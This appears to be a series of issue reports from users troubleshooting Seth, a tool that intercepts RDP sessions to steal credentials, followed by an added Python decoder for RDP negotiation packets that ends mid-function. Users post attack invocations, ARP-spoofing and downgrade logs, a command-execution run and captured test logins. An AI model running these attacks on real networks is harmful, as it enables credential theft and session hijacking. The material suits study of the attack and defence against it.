[!] Failed to clone certificate, create bogus self-signed certificate...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection

The Original XRDP Certificate

I used Wireshark to extract the raw bytes of the certificate that is being served by the RDP server. It looks OK to me. But it is causing the above error.

$ openssl x509 -inform DER -in ../Pentests/███████████████.com/Files/rdpcert.der -text
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            b0:1f:99:b5:7e:8f:05:cd
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN = XRDP
        Validity
            Not Before: Feb  1 00:37:16 2019 GMT
            Not After : Jan 31 00:37:16 2029 GMT
        Subject: CN = XRDP
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (2048 bit)
                Modulus:
                    00:d2:50:65:e0:bb:87:1e:a6:ab:66:c3:bb:52:03:
                    f5:f8:78:a4:4c:f8:03:7c:7d:90:c9:6a:e8:11:5f:
                    93:96:f1:7b:33:11:36:e1:f5:1c:b3:0c:02:59:34:
                    4a:70:2a:49:39:11:90:1e:7c:f9:fb:7e:ea:1b:5e:
                    40:03:da:c3:9f:9d:5e:63:8c:79:f9:b5:e5:4e:85:
                    7d:7d:4b:b2:ce:9d:ab:bc:92:f5:61:4a:0a:09:d7:
                    47:2a:12:8d:e4:16:3e:96:bb:51:e3:59:c0:db:88:
                    ad:f3:dd:20:f2:a3:94:52:93:97:19:ec:91:06:85:
                    7c:d9:eb:12:ee:01:19:c2:57:b9:44:e1:26:4d:02:
                    0f:f0:2f:21:2f:05:43:01:f1:8e:6c:4f:54:20:9d:
                    cf:7f:85:7d:55:43:4d:a6:36:aa:5f:2c:6a:0a:77:
                    08:da:2b:be:96:6a:54:8d:03:94:7a:10:f2:87:2c:
                    35:8c:36:c2:df:7f:4e:55:f6:31:21:7d:4f:c8:dc:
                    d0:dc:22:10:41:f2:32:23:6e:b9:95:4b:8f:59:d1:
                    ca:64:4f:76:15:c5:69:52:73:a8:90:64:36:f8:d1:
                    44:f5:54:7b:de:66:68:68:a2:98:0a:3e:40:63:90:
                    95:48:b3:b8:b3:31:9a:2d:ec:35:81:61:57:a2:d7:
                    f0:45
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Subject Key Identifier: 
                5D:AC:95:A3:4B:6C:67:2C:E1:77:8C:C6:42:E3:7E:A7:65:42:8D:82
            X509v3 Authority Key Identifier: 
                keyid:5D:AC:95:A3:4B:6C:67:2C:E1:77:8C:C6:42:E3:7E:A7:65:42:8D:82

            X509v3 Basic Constraints: 
                CA:TRUE
    Signature Algorithm: sha256WithRSAEncryption
         a8:f7:47:ff:cc:e3:db:f2:fa:a1:d3:58:e1:9b:88:cb:e7:f0:
         13:b8:78:dc:a9:62:1f:c7:a7:ad:c7:c4:86:ed:cd:49:7a:0b:
         27:c7:c2:4a:11:d2:27:a5:4c:0c:17:20:38:72:6f:9f:fa:10:
         ea:ab:50:8a:2b:8c:a8:d9:fa:d9:a0:4f:fe:3f:8d:40:cc:a7:
         20:2a:fd:2e:61:58:b0:f0:71:c5:0e:a5:74:2f:5f:20:7e:8c:
         16:5b:5b:1f:10:7e:90:22:0a:5f:8a:65:74:1c:1c:aa:1e:e1:
         2d:37:7f:80:a1:de:b2:db:57:de:e2:d2:cf:06:2e:1c:1c:77:
         a7:1b:6c:da:dc:0e:58:fe:94:a1:4f:d4:02:48:64:7d:f8:b7:
         e1:a8:5a:38:c1:e9:c2:80:8b:36:c7:25:0a:06:57:3a:35:fb:
         0d:a6:20:5f:7a:c0:2c:af:ad:52:c4:e0:8b:40:11:dd:7d:94:
         fc:23:51:5d:89:ee:59:c4:85:e3:7c:64:3e:32:64:02:37:ac:
         31:44:31:e3:e6:33:a7:78:27:60:59:98:b5:e4:36:16:dd:b5:
         1f:e9:17:ae:06:ec:dc:5b:52:41:8d:df:88:32:0c:59:cc:74:
         b4:61:8a:77:16:1e:af:b4:74:89:27:90:12:fa:8b:6f:c6:a7:
         15:6d:72:9d

Where the error comes from

I assume that the certificate is causing clone-cert.sh to error out after the received certificate is piped to line 60:

openssl s_client -servername "$SERVER" \
    -connect "$HOST" < /dev/null 2>&1 | \
    openssl x509 -outform PEM -out "$ORIG_CERT_FILE"

And I assume that the error is the reason for seth.sh to choose the OR option at line 123, thereby creating a self-signed cert.

CERT_KEY="$($SCRIPT_DIR/clone-cert.sh "$ORIGINAL_DEST:3389" || \
    create_self_signed_cert "$ORIGINAL_DEST")"

Output you might ask for

Unfortunately I can't trace the problem beyond those two lines. Below is the output of the command you asked for in issue #1. Mine seems rather different than what the OP received from his server:

$ openssl s_client -connect ██.██.██.205:3389 < /dev/null
CONNECTED(00000003)
139739288069184:error:1408F10B:SSL routines:ssl3_get_record:wrong version number:../ssl/record/ssl3_record.c:332:
---
no peer certificate available
---
No client certificate CA names sent
---
SSL handshake has read 5 bytes and written 283 bytes
Verification: OK
---
New, (NONE), Cipher is (NONE)
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 0 (ok)
---

One problem or two?

In addition to the error described above, my 'victim' RDP client is not able to connect to the RDP server. On the victim host I've tried using rdesktop and krdc. The latter is one of the many clients that is built on top of xfreerdp. I would expect the latter to validate the (forged) certificate, as you mentioned in your excellent paper. But neither RDP client is able to establish a connection to the RDP server.

By the way, thank you for this very cool and useful tool!

Subnet question

Will this work against a different subnet, i.e.:

attacker IP 10.10.5.23
victim IP 10.10.110.65

Thanks

Help!!

Help.
It does not work, although it does the ARP poisoning correctly.
Is there something I'm forgetting to set up?
Please provide more information, I'm just running ./seth.sh ...
Thank you!

:~/GitHub/Seth# ./seth.sh eth0 192.168.1.14 192.168.1.15 192.168.1.1
███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ [email protected]
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.1.13
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Waiting for connection

Hash not always crackable by John The Ripper

These cases work:

Debug Log (Windows 7 Client 6.3.9600 rdp 8.1) (Server Windows 10 10.0.14393 + NLA) (Login: admin / admin123456) -> https://pastebin.com/A9RNLEKx

Server 2008 R2 6.1.7601 Certificate TLSv1 + AES128-SHA:
Debug Log (Client Windows 7 / 10) -> https://pastebin.com/SWbUEEK4

(Server Windows 2008 R2 6.1.7601 NO NLA Certificate TLSv1 + AES128-SHA Login
Debug Log (Windows 7 / 10 Client) chris1:remoteuser!123456 ) -> https://pastebin.com/K8S6Mz36

These do not:

Server Windows 10 10 10.0.14393 Certificate TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384:
Debug Log (Windows 10 Client 10.0.10586 rdp 10.0) (Server Windows 10 10.0.14393 + NLA) (Login: admin / admin123456) -> https://pastebin.com/pGPMxemG

Server Windows 2012 R2 6.3.9600 TLSv1.2 + ECDHE-RSA-AES256-SHA384:
Debug Log (Client Windows 7 / 10 Login: Administrator / admin-123456) -> https://pastebin.com/Ar8Lb8pK

Can't handling connection with error Broken pipe

I can't connect to the server from the victim.
I have an issue with a Broken pipe error in run_fake_server:

Traceback (most recent call last):
  File "/usr/lib/python3.5/threading.py", line 914, in _bootstrap_inner
    self.run()
  File "/root/Seth/seth/main.py", line 42, in run
    self.run_fake_server()
  File "/root/Seth/seth/main.py", line 87, in run_fake_server
    (id, id)))
  File "/usr/lib/python3.5/ssl.py", line 861, in send
    return self._sslobj.write(data)
  File "/usr/lib/python3.5/ssl.py", line 586, in write
    return self._sslobj.write(data)
BrokenPipeError: [Errno 32] Broken pipe

Can anyone help me understand my issue?
[Screenshot]

RC4 Not available on Client, Attack might not work

Hi Adrian,

This attack is not working in my scenario. I have Kali as the attacker (192.168.1.31), Windows 10 as the victim (192.168.1.21) and Server 2012 as the host (192.168.1.11). Please be informed that my Windows 10 and Server 2012 machines are in a domain environment. Below are the debug output and the command I ran. I would highly appreciate your help.

===================================================================
root@kali:~/tools/Seth# SETH_DEBUG=1 ./seth.sh eth1 192.168.1.{31,21,11}
███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ [email protected]
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.1.11
[*] Clone the x509 certificate of the original destination...
unable to load certificate
139625035678784:error:0909006C:PEM routines:get_name:no start line:../crypto/pem/pem_lib.c:745:Expecting: TRUSTED CERTIFICATE
[!] Failed to clone certificate, create bogus self-signed certificate...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 192.168.1.21:49788
Warning: RC4 not available on client, attack might not work
From client:
00000000: 03 00 00 2F 2A E0 00 00 00 00 00 43 6F 6F 6B 69 .../*......Cooki
00000010: 65 3A 20 6D 73 74 73 68 61 73 68 3D 4D 49 43 52 e: mstshash=MICR
Listening for new connection
00000020: 4F 53 4F 46 54 0D 0A 01 00 08 00 0B 00 00 00 OSOFT..........
Downgrading authentication options from 11 to 3
From client: (modified)
00000000: 03 00 00 2F 2A E0 00 00 00 00 00 43 6F 6F 6B 69 .../*......Cooki
00000010: 65 3A 20 6D 73 74 73 68 61 73 68 3D 4D 49 43 52 e: mstshash=MICR
00000020: 4F 53 4F 46 54 0D 0A 01 00 08 00 03 00 00 00 OSOFT..........
From server:
00000000: 03 00 00 13 0E D0 00 00 12 34 00 02 0F 08 00 02 .........4......
00000010: 00 00 00 ...
Enable SSL
Connection lost
Connection lost (file descriptor cannot be a negative integer (-1))
Connection lost (file descriptor cannot be a negative integer (-1))
Connection lost (file descriptor cannot be a negative integer (-1))
Connection lost (file descriptor cannot be a negative integer (-1))

===================================================================
root@kali:~/tools/Seth# sslscan 192.168.1.11:3389
Version: 1.11.13-static
OpenSSL 1.0.2-chacha (1.0.2g-dev)

Connected to 192.168.1.11

Testing SSL server 192.168.1.11 on port 3389 using SNI name 192.168.1.11

TLS Fallback SCSV:
Server does not support TLS Fallback SCSV

TLS renegotiation:
Secure session renegotiation supported

TLS Compression:
Compression disabled

Heartbleed:
TLS 1.2 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.0 not vulnerable to heartbleed

Supported Server Cipher(s):
Preferred TLSv1.2 128 bits AES128-SHA256
Accepted TLSv1.2 128 bits AES128-SHA
Accepted TLSv1.2 256 bits AES256-SHA256
Accepted TLSv1.2 256 bits AES256-SHA
Accepted TLSv1.2 128 bits RC4-SHA
Accepted TLSv1.2 112 bits DES-CBC3-SHA
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.2 128 bits RC4-MD5
Preferred TLSv1.1 128 bits AES128-SHA
Accepted TLSv1.1 256 bits AES256-SHA
Accepted TLSv1.1 128 bits RC4-SHA
Accepted TLSv1.1 112 bits DES-CBC3-SHA
Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.1 128 bits RC4-MD5
Preferred TLSv1.0 128 bits AES128-SHA
Accepted TLSv1.0 256 bits AES256-SHA
Accepted TLSv1.0 128 bits RC4-SHA
Accepted TLSv1.0 112 bits DES-CBC3-SHA
Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.0 128 bits RC4-MD5

SSL Certificate:
Signature Algorithm: sha1WithRSAEncryption
RSA Key Strength: 2048

Subject: SERVER2012.microsofts.com
Issuer: SERVER2012.microsofts.com

Not valid before: Jul 4 16:34:43 2019 GMT
Not valid after: Jan 3 16:34:43 2020 GMT

===================================================================
root@kali:~/tools/Seth# openssl ciphers -v
TLS_AES_256_GCM_SHA384 TLSv1.3 Kx=any Au=any Enc=AESGCM(256) Mac=AEAD
TLS_CHACHA20_POLY1305_SHA256 TLSv1.3 Kx=any Au=any Enc=CHACHA20/POLY1305(256) Mac=AEAD
TLS_AES_128_GCM_SHA256 TLSv1.3 Kx=any Au=any Enc=AESGCM(128) Mac=AEAD
ECDHE-ECDSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH Au=ECDSA Enc=AESGCM(256) Mac=AEAD
ECDHE-RSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH Au=RSA Enc=AESGCM(256) Mac=AEAD
DHE-RSA-AES256-GCM-SHA384 TLSv1.2 Kx=DH Au=RSA Enc=AESGCM(256) Mac=AEAD
ECDHE-ECDSA-CHACHA20-POLY1305 TLSv1.2 Kx=ECDH Au=ECDSA Enc=CHACHA20/POLY1305(256) Mac=AEAD
ECDHE-RSA-CHACHA20-POLY1305 TLSv1.2 Kx=ECDH Au=RSA Enc=CHACHA20/POLY1305(256) Mac=AEAD
DHE-RSA-CHACHA20-POLY1305 TLSv1.2 Kx=DH Au=RSA Enc=CHACHA20/POLY1305(256) Mac=AEAD
ECDHE-ECDSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH Au=ECDSA Enc=AESGCM(128) Mac=AEAD
ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH Au=RSA Enc=AESGCM(128) Mac=AEAD
DHE-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=DH Au=RSA Enc=AESGCM(128) Mac=AEAD
ECDHE-ECDSA-AES256-SHA384 TLSv1.2 Kx=ECDH Au=ECDSA Enc=AES(256) Mac=SHA384
ECDHE-RSA-AES256-SHA384 TLSv1.2 Kx=ECDH Au=RSA Enc=AES(256) Mac=SHA384
DHE-RSA-AES256-SHA256 TLSv1.2 Kx=DH Au=RSA Enc=AES(256) Mac=SHA256
ECDHE-ECDSA-AES128-SHA256 TLSv1.2 Kx=ECDH Au=ECDSA Enc=AES(128) Mac=SHA256
ECDHE-RSA-AES128-SHA256 TLSv1.2 Kx=ECDH Au=RSA Enc=AES(128) Mac=SHA256
DHE-RSA-AES128-SHA256 TLSv1.2 Kx=DH Au=RSA Enc=AES(128) Mac=SHA256
ECDHE-ECDSA-AES256-SHA TLSv1 Kx=ECDH Au=ECDSA Enc=AES(256) Mac=SHA1
ECDHE-RSA-AES256-SHA TLSv1 Kx=ECDH Au=RSA Enc=AES(256) Mac=SHA1
DHE-RSA-AES256-SHA SSLv3 Kx=DH Au=RSA Enc=AES(256) Mac=SHA1
ECDHE-ECDSA-AES128-SHA TLSv1 Kx=ECDH Au=ECDSA Enc=AES(128) Mac=SHA1
ECDHE-RSA-AES128-SHA TLSv1 Kx=ECDH Au=RSA Enc=AES(128) Mac=SHA1
DHE-RSA-AES128-SHA SSLv3 Kx=DH Au=RSA Enc=AES(128) Mac=SHA1
RSA-PSK-AES256-GCM-SHA384 TLSv1.2 Kx=RSAPSK Au=RSA Enc=AESGCM(256) Mac=AEAD
DHE-PSK-AES256-GCM-SHA384 TLSv1.2 Kx=DHEPSK Au=PSK Enc=AESGCM(256) Mac=AEAD
RSA-PSK-CHACHA20-POLY1305 TLSv1.2 Kx=RSAPSK Au=RSA Enc=CHACHA20/POLY1305(256) Mac=AEAD
DHE-PSK-CHACHA20-POLY1305 TLSv1.2 Kx=DHEPSK Au=PSK Enc=CHACHA20/POLY1305(256) Mac=AEAD
ECDHE-PSK-CHACHA20-POLY1305 TLSv1.2 Kx=ECDHEPSK Au=PSK Enc=CHACHA20/POLY1305(256) Mac=AEAD
AES256-GCM-SHA384 TLSv1.2 Kx=RSA Au=RSA Enc=AESGCM(256) Mac=AEAD
PSK-AES256-GCM-SHA384 TLSv1.2 Kx=PSK Au=PSK Enc=AESGCM(256) Mac=AEAD
PSK-CHACHA20-POLY1305 TLSv1.2 Kx=PSK Au=PSK Enc=CHACHA20/POLY1305(256) Mac=AEAD
RSA-PSK-AES128-GCM-SHA256 TLSv1.2 Kx=RSAPSK Au=RSA Enc=AESGCM(128) Mac=AEAD
DHE-PSK-AES128-GCM-SHA256 TLSv1.2 Kx=DHEPSK Au=PSK Enc=AESGCM(128) Mac=AEAD
AES128-GCM-SHA256 TLSv1.2 Kx=RSA Au=RSA Enc=AESGCM(128) Mac=AEAD
PSK-AES128-GCM-SHA256 TLSv1.2 Kx=PSK Au=PSK Enc=AESGCM(128) Mac=AEAD
AES256-SHA256 TLSv1.2 Kx=RSA Au=RSA Enc=AES(256) Mac=SHA256
AES128-SHA256 TLSv1.2 Kx=RSA Au=RSA Enc=AES(128) Mac=SHA256
ECDHE-PSK-AES256-CBC-SHA384 TLSv1 Kx=ECDHEPSK Au=PSK Enc=AES(256) Mac=SHA384
ECDHE-PSK-AES256-CBC-SHA TLSv1 Kx=ECDHEPSK Au=PSK Enc=AES(256) Mac=SHA1
SRP-RSA-AES-256-CBC-SHA SSLv3 Kx=SRP Au=RSA Enc=AES(256) Mac=SHA1
SRP-AES-256-CBC-SHA SSLv3 Kx=SRP Au=SRP Enc=AES(256) Mac=SHA1
RSA-PSK-AES256-CBC-SHA384 TLSv1 Kx=RSAPSK Au=RSA Enc=AES(256) Mac=SHA384
DHE-PSK-AES256-CBC-SHA384 TLSv1 Kx=DHEPSK Au=PSK Enc=AES(256) Mac=SHA384
RSA-PSK-AES256-CBC-SHA SSLv3 Kx=RSAPSK Au=RSA Enc=AES(256) Mac=SHA1
DHE-PSK-AES256-CBC-SHA SSLv3 Kx=DHEPSK Au=PSK Enc=AES(256) Mac=SHA1
AES256-SHA SSLv3 Kx=RSA Au=RSA Enc=AES(256) Mac=SHA1
PSK-AES256-CBC-SHA384 TLSv1 Kx=PSK Au=PSK Enc=AES(256) Mac=SHA384
PSK-AES256-CBC-SHA SSLv3 Kx=PSK Au=PSK Enc=AES(256) Mac=SHA1
ECDHE-PSK-AES128-CBC-SHA256 TLSv1 Kx=ECDHEPSK Au=PSK Enc=AES(128) Mac=SHA256
ECDHE-PSK-AES128-CBC-SHA TLSv1 Kx=ECDHEPSK Au=PSK Enc=AES(128) Mac=SHA1
SRP-RSA-AES-128-CBC-SHA SSLv3 Kx=SRP Au=RSA Enc=AES(128) Mac=SHA1
SRP-AES-128-CBC-SHA SSLv3 Kx=SRP Au=SRP Enc=AES(128) Mac=SHA1
RSA-PSK-AES128-CBC-SHA256 TLSv1 Kx=RSAPSK Au=RSA Enc=AES(128) Mac=SHA256
DHE-PSK-AES128-CBC-SHA256 TLSv1 Kx=DHEPSK Au=PSK Enc=AES(128) Mac=SHA256
RSA-PSK-AES128-CBC-SHA SSLv3 Kx=RSAPSK Au=RSA Enc=AES(128) Mac=SHA1
DHE-PSK-AES128-CBC-SHA SSLv3 Kx=DHEPSK Au=PSK Enc=AES(128) Mac=SHA1
AES128-SHA SSLv3 Kx=RSA Au=RSA Enc=AES(128) Mac=SHA1
PSK-AES128-CBC-SHA256 TLSv1 Kx=PSK Au=PSK Enc=AES(128) Mac=SHA256
PSK-AES128-CBC-SHA SSLv3 Kx=PSK Au=PSK Enc=AES(128) Mac=SHA1

Issue in taking RDP using Seth

Hi Adrian,

Thank you for developing this type of tool. You have done great work.
I am facing an issue: when entering the correct credentials I am not able to get RDP, and because of this I am not able to execute a command like calc.

Error:

.\Lenovo:[email protected]
Exception in thread Thread-3:
Traceback (most recent call last):
File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/root/Seth/seth/main.py", line 47, in run
self.forward_data()
File "/root/Seth/seth/main.py", line 172, in forward_data
self.save_vars(parse_rdp(data, self.vars, From=From))
File "/root/Seth/seth/main.py", line 185, in save_vars
print_var(k, self.vars)
File "/root/Seth/seth/parsing.py", line 445, in print_var
KBD_LAYOUT_CNTRY[vars[k]])
KeyError: 16393

Commands:
./seth.sh eth0 192.168.11.54 192.168.11.58 192.168.11.53 calc

Please help

File Descriptor Cannot be -1

Adrian,
I get this error after a connection has been created: (This is off of a Kali box)

[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 10.5.190.84
[*] Clone the x509 certificate of the original destination...
unable to load certificate
140399066473536:error:0909006C:PEM routines:get_name:no start line:../crypto/pem/pem_lib.c:745:Expecting: TRUSTED CERTIFICATE
[!] Failed to clone certificate, create bogus self-signed certificate...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 10.5.6.69:18437
Warning: RC4 not available on client, attack might not work
Listening for new connection
Enable SSL
Connection lost
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python3.7/threading.py", line 917, in _bootstrap_inner
self.run()
File "/opt/Seth/seth/main.py", line 54, in run
self.forward_data()
File "/opt/Seth/seth/main.py", line 170, in forward_data
readable, _, _ = select.select([self.lsock, self.rsock], [], [])
ValueError: file descriptor cannot be a negative integer (-1)

Connection received from 10.5.6.69:18563
Warning: RC4 not available on client, attack might not work
Listening for new connection
Enable SSL
Connection lost
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.7/threading.py", line 917, in _bootstrap_inner
self.run()
File "/opt/Seth/seth/main.py", line 54, in run
self.forward_data()
File "/opt/Seth/seth/main.py", line 170, in forward_data
readable, _, _ = select.select([self.lsock, self.rsock], [], [])
ValueError: file descriptor cannot be a negative integer (-1)

Not using RC4-SHA because of SSL Error: ('No cipher can be selected.',)

root@kali:~/soft/Seth-master# SETH_DEBUG=1 ./seth.sh wlan1 192.168.1.{2,4,3}
███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ [email protected]
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.1.3
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 192.168.1.4:50100
From client:
00000000: 03 00 00 13 0E E0 00 00 00 00 00 01 00 08 00 03 ................
00000010: 00 00 00 ...
Listening for new connection
From server:
00000000: 03 00 00 13 0E D0 00 00 12 34 00 02 01 08 00 02 .........4......
00000010: 00 00 00 ...
Enable SSL
Not using RC4-SHA because of SSL Error: ('No cipher can be selected.',)
From client:
00000000: 30 37 A0 03 02 01 02 A1 30 30 2E 30 2C A0 2A 04 07......00.0,.*.
00000010: 28 4E 54 4C 4D 53 53 50 00 01 00 00 00 B7 82 08 (NTLMSSP........
00000020: E2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 00 06 01 B1 1D 00 00 00 0F .........
TLS alert internal error received, make sure to use RC4-SHA

root@kali:~/soft/Seth-master# sslscan 192.168.1.3:3389
Version: 1.11.11-static
OpenSSL 1.0.2-chacha (1.0.2g-dev)

Connected to 192.168.1.3

Testing SSL server 192.168.1.3 on port 3389 using SNI name 192.168.1.3

TLS Fallback SCSV:
Server does not support TLS Fallback SCSV

TLS renegotiation:
Secure session renegotiation supported

TLS Compression:
Compression disabled

Heartbleed:
TLS 1.2 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.0 not vulnerable to heartbleed

Supported Server Cipher(s):
Preferred TLSv1.0 128 bits AES128-SHA
Accepted TLSv1.0 256 bits AES256-SHA
Accepted TLSv1.0 128 bits RC4-SHA
Accepted TLSv1.0 112 bits DES-CBC3-SHA
Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.0 128 bits RC4-MD5

SSL Certificate:
Signature Algorithm: sha1WithRSAEncryption
RSA Key Strength: 2048

Subject: Net-PC2
Issuer: Net-PC2

Not valid before: Sep 29 17:07:54 2018 GMT
Not valid after: Mar 31 17:07:54 2019 GMT

SSLError

After "connection received" and "downgrading authentication";

[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.2.106
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Waiting for connection
Connection received from 192.168.2.111
Downgrading authentication options from 11 to 3
Enable SSL
SSLError: [SSL: TLSV1_ALERT_INTERNAL_ERROR] tlsv1 alert internal error (_ssl.c:2090)
Waiting for connection

something went wrong while parsing the output of tcpdump

Hi AV,

I am trying to run Seth with the command below and am getting the error "something went wrong while parsing the output of tcpdump".

./seth.sh inet 192.168.10.20 192.168.10.138

192.168.10.20 - Attacker's IP
192.168.10.138 - Victim's IP.

I am running Kali 2018.1 build ( 64 bit)

Can you please help me out with this issue?

Thanks,
Dhruva

Index out of range during protocol negotiation when using host name

Win X client, Server 2008 R2 server.

Interestingly, if I use the IP instead of the domain name, I get issue #17 instead. On rare occasions, this will 'work', and I get issue #17 again.

(With debug:)

[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is ****
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Warning: The python3 module 'hexdump' is missing. Using hexlify instead.
Listening for new connection
Connection received from ****:34673
From client:

Listening for new connection
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/root/src/Seth/seth/main.py", line 37, in run
self.handle_protocol_negotiation()
File "/root/src/Seth/seth/main.py", line 100, in handle_protocol_negotiation
self.save_vars({"RDP_PROTOCOL_OLD": data[-4]})
IndexError: index out of range

This would suggest that the socket read on line 98 is returning no data. Confirmed with a print(len(data)) check.
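
The following is an added example, not part of the issue reports above and not Seth's own code. It decodes the X.224 negotiation packets that appear as hexdumps in the "RC4 Not available on Client" report, names the protocol flags behind the "from 11 to 3" log line, and rejects an empty or truncated read (the case reported in the last issue) instead of indexing into it. The flag names follow MS-RDPBCGR; the function names and the two byte strings (copied from the hexdumps on this page) are assumptions of the example.

```python
import struct

# requestedProtocols / selectedProtocol bit flags as defined in MS-RDPBCGR.
PROTOCOL_FLAGS = {0x1: "PROTOCOL_SSL", 0x2: "PROTOCOL_HYBRID",
                  0x4: "PROTOCOL_RDSTLS", 0x8: "PROTOCOL_HYBRID_EX"}
NEG_TYPES = {0x01: "RDP_NEG_REQ", 0x02: "RDP_NEG_RSP", 0x03: "RDP_NEG_FAILURE"}
X224_TYPES = {0xE0: "connection request", 0xD0: "connection confirm"}
HEADER_LEN = 11  # 4-byte TPKT header + 7-byte X.224 CR/CC header

# Sample packets, copied from the hexdumps in the issue report above.
CLIENT_REQUEST = (bytes.fromhex("0300002f2ae00000000000")
                  + b"Cookie: mstshash=MICROSOFT\r\n"
                  + bytes.fromhex("010008000b000000"))
SERVER_CONFIRM = bytes.fromhex("030000130ed00000123400020f08000200000000"[:38])


class NegotiationError(ValueError):
    """Raised when a buffer is not a complete RDP negotiation packet."""


def protocol_names(value):
    """Translate a protocol bit field into flag names (0 means plain RDP)."""
    if value == 0:
        return ["PROTOCOL_RDP"]
    return [name for bit, name in sorted(PROTOCOL_FLAGS.items()) if value & bit]


def removed_protocols(before, after):
    """Name the flags present in `before` but missing from `after`."""
    missing = before & ~after
    return protocol_names(missing) if missing else []


def parse_negotiation(data):
    """Parse a TPKT/X.224 connection request or confirm with its RDP_NEG block."""
    if len(data) < HEADER_LEN:
        # Covers the empty read: recv() returned b"" because the peer closed.
        raise NegotiationError("short read: got %d bytes, need at least %d"
                               % (len(data), HEADER_LEN))
    version, _reserved, tpkt_len = struct.unpack(">BBH", data[:4])
    if version != 3:
        raise NegotiationError("not a TPKT packet (version %d)" % version)
    if tpkt_len != len(data):
        raise NegotiationError("TPKT length %d does not match buffer length %d"
                               % (tpkt_len, len(data)))
    x224_type = data[5] & 0xF0
    if x224_type not in X224_TYPES:
        raise NegotiationError("unexpected X.224 PDU type 0x%02x" % data[5])

    body = data[HEADER_LEN:]
    cookie = None
    if x224_type == 0xE0 and body.startswith(b"Cookie:"):
        # Optional cookie or routing token, terminated by CRLF.
        cookie, sep, body = body.partition(b"\r\n")
        if not sep:
            raise NegotiationError("cookie is not terminated by CRLF")

    result = {"pdu": X224_TYPES[x224_type], "cookie": cookie,
              "neg_type": None, "value": None, "protocols": ["PROTOCOL_RDP"]}
    if not body:
        return result  # no negotiation block: Standard RDP Security only
    if len(body) < 8:
        raise NegotiationError("truncated negotiation block (%d bytes)" % len(body))
    neg_type, _flags, length, value = struct.unpack("<BBHI", body[:8])
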